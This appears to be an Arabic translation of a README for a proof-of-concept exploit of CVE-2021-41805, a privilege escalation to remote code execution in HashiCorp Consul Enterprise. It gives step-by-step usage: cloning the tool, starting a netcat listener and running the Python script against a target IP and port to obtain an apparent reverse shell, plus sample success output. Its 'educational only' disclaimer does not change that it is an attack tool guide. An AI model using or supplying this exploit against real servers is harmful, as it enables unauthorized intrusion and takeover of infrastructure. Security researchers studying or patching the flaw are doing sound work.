
إثبات مفهوم لثغرة CVE-2021-41805 وهي ثغرة أمنية في HashiCorp Consul Enterprise تسمح بتنفيذ التعليمات البرمجية عن بُعد (RCE) بصلاحيات مرتفعة.
[!WARNING] إخلاء مسؤولية قانوني: هذه الأداة مخصصة للأغراض التعليمية فقط بشكل صارم! استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. تقع على عاتق المستخدم مسؤولية الامتثال لجميع القوانين المعمول بها أثناء استخدام هذه الأداة. لا يتحمل مطوّر هذه الأداة أي مسؤولية ولا يُعتبر مسؤولًا عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
يمكن استخدام رمز ACL (مع صلاحيات operator:write الافتراضية) في مساحة اسم واحدة لتصعيد امتيازات غير مقصود في مساحة اسم مختلفة. يمكن إساءة استخدام هذا للحصول على تنفيذ الأكواد عن بُعد (RCE) بامتيازات مرتفعة.
git clone https://github.com/acfirthh/CVE-2021-41805.gitcd CVE-2021-41805nc -nvlp <LISTENER_PORT>python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]
تشغيل الاستغلال بالوسائط الأساسية: -r [TARGET_IP]، -rp [TARGET_PORT]، -l [LISTENER_IP]، -lp [LISTENER_PORT] (-t [ACL_TOKEN]، -s [استخدام SSL]) سيعطي مخرجات أساسية مثل:
[*] The PUT request was made successfully. Check your listener...
تشغيل الاستغلال بالوسائط الأساسية بالإضافة إلى -v [VERBOSE] سيعطي مخرجات مفصلة:

إذا حدث خطأ أثناء تشغيل الاستغلال وتم تحديد الوسيط -v، فستكون المخرجات شيئًا مثل:
